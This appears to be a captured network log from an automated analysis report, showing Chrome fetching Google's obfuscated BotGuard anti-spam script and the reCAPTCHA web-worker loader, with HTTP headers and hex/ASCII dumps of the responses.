                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                                                                          Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                                                                          Content-Length: 18908
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: sffe
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Date: Fri, 13 Dec 2024 09:14:19 GMT
                                                                                                                          Expires: Sat, 13 Dec 2025 09:14:19 GMT
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 19:00:00 GMT
                                                                                                                          Content-Type: text/javascript
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Age: 543233
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:12 UTC578INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 55 3d 66 75 6e 63 74 69 6f 6e 28 70 29 7b 72 65 74 75 72 6e 20 70 7d 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 69 66 28 21 28 70 3d 28 62 3d 6e 75 6c 6c 2c 42 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 70 29 7c 7c 21 70 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 70 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 55 2c 63 72 65 61 74 65 53 63 72
                                                                                                                          Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var U=function(p){return p},G=function(p,b){if(!(p=(b=null,B).trustedTypes,p)||!p.createPolicy)return b;try{b=p.createPolicy("bg",{createHTML:U,createScr
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 48 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 66 6f 72 28 62 3d 5b 5d 3b 70 2d 2d 3b 29 62 2e 70 75 73 68 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 32 35 35 7c 30 29 3b 72 65 74 75 72 6e 20 62 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 62 2e 4a 2e 73 70 6c 69 63 65 28 30 2c 30 2c 70 29 7d 2c 65 5f 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 55 2c 42 2c 59 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 7d 72 65 74 75 72 6e 20 42 3d 28 70 3d 24 71 28 70 2c 66 75 6e 63 74 69 6f 6e 28 76 29 7b 72 26 26 28 62 26 26 62 62 28 62 29 2c 59 3d 76 2c 72 28 29 2c 72 3d 76 6f 69 64 20 30 29 7d 2c 28 59 3d 76 6f 69 64
                                                                                                                          Data Ascii: DX-License-Identifier: Apache-2.0','*/','var H=function(p,b){for(b=[];p--;)b.push(Math.random()*255|0);return b},C=function(p,b){b.J.splice(0,0,p)},e_=function(p,b,U,B,Y){function r(){}return B=(p=$q(p,function(v){r&&(b&&bb(b),Y=v,r(),r=void 0)},(Y=void
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 73 75 62 73 74 72 69 6e 67 28 33 29 2c 62 2c 55 2c 42 2c 59 2c 72 2c 76 29 3a 6f 65 28 62 2c 70 29 7d 2c 66 69 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 20 62 3d 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 70 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 66 61 6c 73 65 2c 76 61 6c 75 65 3a 70 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 74 72 75 65 7d 7d 7d 2c 72 6a 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 28 62 3d 64 28 70 29 2c 62 29 26 31 32 38 26 26 28 62 3d 62 26 31 32 37 7c 64 28 70 29 3c 3c 37 29 2c 62 7d 2c 76 41 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 20 70 5b 62 5d 3c 3c 32 34 7c 70 5b 28 62 7c 30 29 2b 31 5d 3c 3c 31 36 7c 70 5b 28 62 7c 30 29 2b 32 5d 3c 3c 38 7c 70
                                                                                                                          Data Ascii: substring(3),b,U,B,Y,r,v):oe(b,p)},fi=function(p,b){return b=0,function(){return b<p.length?{done:false,value:p[b++]}:{done:true}}},rj=function(p,b){return(b=d(p),b)&128&&(b=b&127|d(p)<<7),b},vA=function(p,b){return p[b]<<24|p[(b|0)+1]<<16|p[(b|0)+2]<<8|p
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 29 29 2c 70 29 2e 42 2b 3d 70 2e 6a 28 29 2d 62 7d 65 6c 73 65 20 69 66 28 42 3d 3d 79 64 29 62 5b 33 5d 26 26 28 70 2e 6f 3d 74 72 75 65 29 2c 62 5b 34 5d 26 26 28 70 2e 44 3d 74 72 75 65 29 2c 70 2e 56 28 62 29 3b 65 6c 73 65 20 69 66 28 42 3d 3d 74 34 29 70 2e 6f 3d 74 72 75 65 2c 70 2e 56 28 62 29 3b 65 6c 73 65 20 69 66 28 42 3d 3d 78 71 29 7b 74 72 79 7b 66 6f 72 28 55 3d 30 3b 55 3c 70 2e 54 2e 6c 65 6e 67 74 68 3b 55 2b 2b 29 74 72 79 7b 59 3d 70 2e 54 5b 55 5d 2c 59 5b 30 5d 5b 59 5b 31 5d 5d 28 59 5b 32 5d 29 7d 63 61 74 63 68 28 72 29 7b 7d 7d 63 61 74 63 68 28 72 29 7b 7d 28 28 30 2c 62 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 72 2c 76 29 7b 70 2e 6a 32 28 72 2c 74 72 75 65 2c 76 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 43 28 28 72 3d
                                                                                                                          Data Ascii: )),p).B+=p.j()-b}else if(B==yd)b[3]&&(p.o=true),b[4]&&(p.D=true),p.V(b);else if(B==t4)p.o=true,p.V(b);else if(B==xq){try{for(U=0;U<p.T.length;U++)try{Y=p.T[U],Y[0][Y[1]](Y[2])}catch(r){}}catch(r){}((0,b[1])(function(r,v){p.j2(r,true,v)},function(r){(C((r=
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 72 73 65 28 62 29 7d 63 61 74 63 68 28 65 29 7b 70 2e 67 3d 7b 7d 7d 46 28 28 28 50 28 28 50 28 28 4c 28 70 2c 33 31 30 2c 28 4c 28 70 2c 28 28 28 50 28 66 75 6e 63 74 69 6f 6e 28 65 2c 47 2c 58 2c 66 2c 54 2c 79 2c 68 2c 52 2c 61 2c 77 2c 49 2c 6d 29 7b 66 75 6e 63 74 69 6f 6e 20 4e 28 6e 2c 75 29 7b 66 6f 72 28 3b 52 3c 6e 3b 29 61 7c 3d 64 28 65 29 3c 3c 52 2c 52 2b 3d 38 3b 72 65 74 75 72 6e 20 75 3d 28 52 2d 3d 6e 2c 61 29 26 28 31 3c 3c 6e 29 2d 31 2c 61 3e 3e 3d 6e 2c 75 7d 66 6f 72 28 49 3d 28 79 3d 28 66 3d 28 47 3d 4a 28 65 29 2c 52 3d 61 3d 30 2c 4e 28 33 29 7c 30 29 2b 31 2c 6d 3d 4e 28 35 29 2c 30 29 2c 77 3d 5b 5d 2c 30 29 3b 79 3c 6d 3b 79 2b 2b 29 54 3d 4e 28 31 29 2c 77 2e 70 75 73 68 28 54 29 2c 49 2b 3d 54 3f 30 3a 31 3b 66 6f 72 28 79
                                                                                                                          Data Ascii: rse(b)}catch(e){p.g={}}F(((P((P((L(p,310,(L(p,(((P(function(e,G,X,f,T,y,h,R,a,w,I,m){function N(n,u){for(;R<n;)a|=d(e)<<R,R+=8;return u=(R-=n,a)&(1<<n)-1,a>>=n,u}for(I=(y=(f=(G=J(e),R=a=0,N(3)|0)+1,m=N(5),0),w=[],0);y<m;y++)T=N(1),w.push(T),I+=T?0:1;for(y
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 3d 28 47 5b 47 5b 33 35 33 5d 3d 65 2e 4f 5b 33 35 33 5d 2c 33 32 36 5d 3d 65 2e 4f 5b 33 32 36 5d 2c 47 29 7d 65 6c 73 65 20 4c 28 65 2c 32 31 32 2c 65 2e 4b 29 7d 2c 28 4c 28 28 4c 28 70 2c 28 50 28 66 75 6e 63 74 69 6f 6e 28 65 2c 47 2c 58 2c 66 29 7b 4c 28 65 2c 28 58 3d 28 47 3d 28 66 3d 4a 28 65 29 2c 4a 29 28 65 29 2c 4a 28 65 29 29 2c 47 3d 74 28 47 2c 65 29 2c 66 3d 74 28 66 2c 65 29 2c 58 29 2c 66 20 69 6e 20 47 7c 30 29 7d 2c 28 4c 28 70 2c 28 50 28 66 75 6e 63 74 69 6f 6e 28 65 2c 47 2c 58 2c 66 29 7b 4c 28 65 2c 28 66 3d 74 28 28 58 3d 28 47 3d 28 66 3d 28 58 3d 4a 28 65 29 2c 4a 28 65 29 29 2c 4a 28 65 29 29 2c 74 28 58 2c 65 29 29 2c 66 29 2c 65 29 2c 47 29 2c 58 5b 66 5d 29 7d 2c 28 4c 28 70 2c 28 50 28 28 50 28 66 75 6e 63 74 69 6f 6e 28
                                                                                                                          Data Ascii: =(G[G[353]=e.O[353],326]=e.O[326],G)}else L(e,212,e.K)},(L((L(p,(P(function(e,G,X,f){L(e,(X=(G=(f=J(e),J)(e),J(e)),G=t(G,e),f=t(f,e),X),f in G|0)},(L(p,(P(function(e,G,X,f){L(e,(f=t((X=(G=(f=(X=J(e),J(e)),J(e)),t(X,e)),f),e),G),X[f])},(L(p,(P((P(function(
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 2c 79 2c 68 29 7b 66 6f 72 28 79 3d 28 58 3d 74 28 31 33 32 2c 28 68 3d 28 54 3d 4a 28 65 29 2c 72 6a 28 65 29 29 2c 47 3d 22 22 2c 65 29 29 2c 58 2e 6c 65 6e 67 74 68 29 2c 66 3d 30 3b 68 2d 2d 3b 29 66 3d 28 28 66 7c 30 29 2b 28 72 6a 28 65 29 7c 30 29 29 25 79 2c 47 2b 3d 57 5b 58 5b 66 5d 5d 3b 4c 28 65 2c 54 2c 47 29 7d 29 2c 70 2c 32 35 30 29 2c 34 33 36 29 2c 30 29 2c 70 29 2c 31 30 32 29 2c 33 32 36 29 2c 5b 32 30 34 38 5d 29 2c 70 29 2c 31 31 33 29 2c 32 34 35 29 2c 51 29 2c 70 29 2c 31 37 31 2c 5b 30 2c 30 2c 30 5d 29 2c 70 29 2c 31 33 37 29 2c 33 35 33 29 2c 5b 5d 29 2c 4c 28 70 2c 37 33 2c 30 29 2c 70 29 2c 36 31 29 2c 70 29 2c 33 37 33 29 2c 70 2e 69 39 3d 30 2c 34 32 31 29 2c 5b 5d 29 2c 70 29 2c 36 35 29 2c 31 31 31 29 29 2c 32 34 30 29 29
                                                                                                                          Data Ascii: ,y,h){for(y=(X=t(132,(h=(T=J(e),rj(e)),G="",e)),X.length),f=0;h--;)f=((f|0)+(rj(e)|0))%y,G+=W[X[f]];L(e,T,G)}),p,250),436),0),p),102),326),[2048]),p),113),245),Q),p),171,[0,0,0]),p),137),353),[]),L(p,73,0),p),61),p),373),p.i9=0,421),[]),p),65),111)),240))
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 31 36 7c 7c 62 3d 3d 32 30 34 7c 7c 62 3d 3d 33 35 33 7c 7c 62 3d 3d 34 32 31 7c 7c 62 3d 3d 37 36 7c 7c 62 3d 3d 31 37 31 7c 7c 62 3d 3d 32 36 38 7c 7c 62 3d 3d 33 32 36 3f 70 2e 4f 5b 62 5d 7c 7c 28 70 2e 4f 5b 62 5d 3d 59 71 28 70 2c 55 2c 62 2c 31 34 32 29 29 3a 70 2e 4f 5b 62 5d 3d 59 71 28 70 2c 55 2c 62 2c 31 31 33 29 7d 62 3d 3d 32 33 32 26 26 28 70 2e 4e 3d 44 28 66 61 6c 73 65 2c 33 32 2c 70 29 2c 70 2e 46 3d 76 6f 69 64 20 30 29 7d 2c 56 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 70 2e 59 3d 28 28 70 2e 59 3f 70 2e 59 2b 22 7e 22 3a 22 45 3a 22 29 2b 62 2e 6d 65 73 73 61 67 65 2b 22 3a 22 2b 62 2e 73 74 61 63 6b 29 2e 73 6c 69 63 65 28 30 2c 32 30 34 38 29 7d 2c 49 65 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 55 2c 42 2c 59 29 7b 71 28 28 28
                                                                                                                          Data Ascii: 16||b==204||b==353||b==421||b==76||b==171||b==268||b==326?p.O[b]||(p.O[b]=Yq(p,U,b,142)):p.O[b]=Yq(p,U,b,113)}b==232&&(p.N=D(false,32,p),p.F=void 0)},V=function(p,b){p.Y=((p.Y?p.Y+"~":"E:")+b.message+":"+b.stack).slice(0,2048)},Ie=function(p,b,U,B,Y){q(((
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 31 32 38 29 3a 62 5b 59 2b 2b 5d 3d 42 3e 3e 31 32 7c 32 32 34 2c 62 5b 59 2b 2b 5d 3d 42 3e 3e 36 26 36 33 7c 31 32 38 29 2c 62 5b 59 2b 2b 5d 3d 42 26 36 33 7c 31 32 38 29 3b 72 65 74 75 72 6e 20 62 7d 2c 61 65 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 55 2c 42 2c 59 2c 72 29 7b 69 66 28 21 62 2e 59 29 7b 62 2e 49 2b 2b 3b 74 72 79 7b 66 6f 72 28 72 3d 28 42 3d 28 59 3d 62 2e 4b 2c 76 6f 69 64 20 30 29 2c 30 29 3b 2d 2d 70 3b 29 74 72 79 7b 69 66 28 28 55 3d 76 6f 69 64 20 30 2c 62 29 2e 73 29 42 3d 7a 4e 28 62 2c 62 2e 73 29 3b 65 6c 73 65 7b 69 66 28 72 3d 74 28 32 31 32 2c 62 29 2c 72 3e 3d 59 29 62 72 65 61 6b 3b 42 3d 28 55 3d 4a 28 28 4c 28 62 2c 31 32 35 2c 72 29 2c 62 29 29 2c 74 28 55 2c 62 29 29 7d 42 26 26 42 5b 68 34 5d 26 32 30 34 38 3f 42
                                                                                                                          Data Ascii: 128):b[Y++]=B>>12|224,b[Y++]=B>>6&63|128),b[Y++]=B&63|128);return b},ae=function(p,b,U,B,Y,r){if(!b.Y){b.I++;try{for(r=(B=(Y=b.K,void 0),0);--p;)try{if((U=void 0,b).s)B=zN(b,b.s);else{if(r=t(212,b),r>=Y)break;B=(U=J((L(b,125,r),b)),t(U,b))}B&&B[h4]&2048?B
                                                                                                                          2024-12-19 16:08:12 UTC1390INData Raw: 62 2e 57 2c 70 28 66 75 6e 63 74 69 6f 6e 28 29 7b 46 28 74 72 75 65 2c 62 2c 74 72 75 65 29 7d 29 3b 62 72 65 61 6b 7d 7d 72 65 74 75 72 6e 20 55 7d 2c 4f 47 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 28 62 2e 70 75 73 68 28 70 5b 30 5d 3c 3c 32 34 7c 70 5b 31 5d 3c 3c 31 36 7c 70 5b 32 5d 3c 3c 38 7c 70 5b 33 5d 29 2c 62 2e 70 75 73 68 28 70 5b 34 5d 3c 3c 32 34 7c 70 5b 35 5d 3c 3c 31 36 7c 70 5b 36 5d 3c 3c 38 7c 70 5b 37 5d 29 2c 62 29 2e 70 75 73 68 28 70 5b 38 5d 3c 3c 32 34 7c 70 5b 39 5d 3c 3c 31 36 7c 70 5b 31 30 5d 3c 3c 38 7c 70 5b 31 31 5d 29 7d 2c 5a 3d 7b 70 61 73 73 69 76 65 3a 74 72 75 65 2c 63 61 70 74 75 72 65 3a 74 72 75 65 7d 2c 7a 4e 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 28 62 3d 62 2e 63 72 65 61 74 65 28
                                                                                                                          Data Ascii: b.W,p(function(){F(true,b,true)});break}}return U},OG=function(p,b){(b.push(p[0]<<24|p[1]<<16|p[2]<<8|p[3]),b.push(p[4]<<24|p[5]<<16|p[6]<<8|p[7]),b).push(p[8]<<24|p[9]<<16|p[10]<<8|p[11])},Z={passive:true,capture:true},zN=function(p,b){return(b=b.create(


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.1649737172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:14 UTC491OUTGET /recaptcha/api2/webworker.js?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37 HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:14 UTC917INHTTP/1.1 200 OK
                                                                                                                          Content-Type: text/javascript; charset=utf-8
                                                                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                                                                          Report-To: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:14 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:14 GMT
                                                                                                                          Cache-Control: private, max-age=300
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:14 UTC108INData Raw: 36 36 0d 0a 69 6d 70 6f 72 74 53 63 72 69 70 74 73 28 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 72 65 6c 65 61 73 65 73 2f 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 2f 72 65 63 61 70 74 63 68 61 5f 5f 65 6e 2e 6a 73 27 29 3b 0d 0a
                                                                                                                          Data Ascii: 66importScripts('https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js');
                                                                                                                          2024-12-19 16:08:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.1649738172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:14 UTC483OUTGET /js/bg/Xe7AbhhPfZcEikoNmhghBXAEhOusDIBKWKS_roS4Q7E.js HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:14 UTC812INHTTP/1.1 200 OK
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/botguard-scs
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          Cross-Origin-Opener-Policy: same-origin; report-to="botguard-scs"
                                                                                                                          Report-To: {"group":"botguard-scs","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/botguard-scs"}]}
                                                                                                                          Content-Length: 18908
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Server: sffe
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          Date: Fri, 13 Dec 2024 09:14:19 GMT
                                                                                                                          Expires: Sat, 13 Dec 2025 09:14:19 GMT
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 19:00:00 GMT
                                                                                                                          Content-Type: text/javascript
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Age: 543235
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
                                                                                                                          2024-12-19 16:08:14 UTC578INData Raw: 2f 2a 20 41 6e 74 69 2d 73 70 61 6d 2e 20 57 61 6e 74 20 74 6f 20 73 61 79 20 68 65 6c 6c 6f 3f 20 43 6f 6e 74 61 63 74 20 28 62 61 73 65 36 34 29 20 59 6d 39 30 5a 33 56 68 63 6d 51 74 59 32 39 75 64 47 46 6a 64 45 42 6e 62 32 39 6e 62 47 55 75 59 32 39 74 20 2a 2f 20 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 55 3d 66 75 6e 63 74 69 6f 6e 28 70 29 7b 72 65 74 75 72 6e 20 70 7d 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 69 66 28 21 28 70 3d 28 62 3d 6e 75 6c 6c 2c 42 29 2e 74 72 75 73 74 65 64 54 79 70 65 73 2c 70 29 7c 7c 21 70 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 29 72 65 74 75 72 6e 20 62 3b 74 72 79 7b 62 3d 70 2e 63 72 65 61 74 65 50 6f 6c 69 63 79 28 22 62 67 22 2c 7b 63 72 65 61 74 65 48 54 4d 4c 3a 55 2c 63 72 65 61 74 65 53 63 72
                                                                                                                          Data Ascii: /* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var U=function(p){return p},G=function(p,b){if(!(p=(b=null,B).trustedTypes,p)||!p.createPolicy)return b;try{b=p.createPolicy("bg",{createHTML:U,createScr
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 27 2c 0a 27 2a 2f 27 2c 0a 27 76 61 72 20 48 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 66 6f 72 28 62 3d 5b 5d 3b 70 2d 2d 3b 29 62 2e 70 75 73 68 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 32 35 35 7c 30 29 3b 72 65 74 75 72 6e 20 62 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 62 2e 4a 2e 73 70 6c 69 63 65 28 30 2c 30 2c 70 29 7d 2c 65 5f 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 2c 55 2c 42 2c 59 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 7d 72 65 74 75 72 6e 20 42 3d 28 70 3d 24 71 28 70 2c 66 75 6e 63 74 69 6f 6e 28 76 29 7b 72 26 26 28 62 26 26 62 62 28 62 29 2c 59 3d 76 2c 72 28 29 2c 72 3d 76 6f 69 64 20 30 29 7d 2c 28 59 3d 76 6f 69 64
                                                                                                                          Data Ascii: DX-License-Identifier: Apache-2.0','*/','var H=function(p,b){for(b=[];p--;)b.push(Math.random()*255|0);return b},C=function(p,b){b.J.splice(0,0,p)},e_=function(p,b,U,B,Y){function r(){}return B=(p=$q(p,function(v){r&&(b&&bb(b),Y=v,r(),r=void 0)},(Y=void
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 73 75 62 73 74 72 69 6e 67 28 33 29 2c 62 2c 55 2c 42 2c 59 2c 72 2c 76 29 3a 6f 65 28 62 2c 70 29 7d 2c 66 69 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 20 62 3d 30 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 62 3c 70 2e 6c 65 6e 67 74 68 3f 7b 64 6f 6e 65 3a 66 61 6c 73 65 2c 76 61 6c 75 65 3a 70 5b 62 2b 2b 5d 7d 3a 7b 64 6f 6e 65 3a 74 72 75 65 7d 7d 7d 2c 72 6a 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 28 62 3d 64 28 70 29 2c 62 29 26 31 32 38 26 26 28 62 3d 62 26 31 32 37 7c 64 28 70 29 3c 3c 37 29 2c 62 7d 2c 76 41 3d 66 75 6e 63 74 69 6f 6e 28 70 2c 62 29 7b 72 65 74 75 72 6e 20 70 5b 62 5d 3c 3c 32 34 7c 70 5b 28 62 7c 30 29 2b 31 5d 3c 3c 31 36 7c 70 5b 28 62 7c 30 29 2b 32 5d 3c 3c 38 7c 70
                                                                                                                          Data Ascii: substring(3),b,U,B,Y,r,v):oe(b,p)},fi=function(p,b){return b=0,function(){return b<p.length?{done:false,value:p[b++]}:{done:true}}},rj=function(p,b){return(b=d(p),b)&128&&(b=b&127|d(p)<<7),b},vA=function(p,b){return p[b]<<24|p[(b|0)+1]<<16|p[(b|0)+2]<<8|p
                                                                                                                          2024-12-19 16:08:14 UTC1390INData Raw: 29 29 2c 70 29 2e 42 2b 3d 70 2e 6a 28 29 2d 62 7d 65 6c 73 65 20 69 66 28 42 3d 3d 79 64 29 62 5b 33 5d 26 26 28 70 2e 6f 3d 74 72 75 65 29 2c 62 5b 34 5d 26 26 28 70 2e 44 3d 74 72 75 65 29 2c 70 2e 56 28 62 29 3b 65 6c 73 65 20 69 66 28 42 3d 3d 74 34 29 70 2e 6f 3d 74 72 75 65 2c 70 2e 56 28 62 29 3b 65 6c 73 65 20 69 66 28 42 3d 3d 78 71 29 7b 74 72 79 7b 66 6f 72 28 55 3d 30 3b 55 3c 70 2e 54 2e 6c 65 6e 67 74 68 3b 55 2b 2b 29 74 72 79 7b 59 3d 70 2e 54 5b 55 5d 2c 59 5b 30 5d 5b 59 5b 31 5d 5d 28 59 5b 32 5d 29 7d 63 61 74 63 68 28 72 29 7b 7d 7d 63 61 74 63 68 28 72 29 7b 7d 28 28 30 2c 62 5b 31 5d 29 28 66 75 6e 63 74 69 6f 6e 28 72 2c 76 29 7b 70 2e 6a 32 28 72 2c 74 72 75 65 2c 76 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 72 29 7b 28 43 28 28 72 3d
                                                                                                                          Data Ascii: )),p).B+=p.j()-b}else if(B==yd)b[3]&&(p.o=true),b[4]&&(p.D=true),p.V(b);else if(B==t4)p.o=true,p.V(b);else if(B==xq){try{for(U=0;U<p.T.length;U++)try{Y=p.T[U],Y[0][Y[1]](Y[2])}catch(r){}}catch(r){}((0,b[1])(function(r,v){p.j2(r,true,v)},function(r){(C((r=
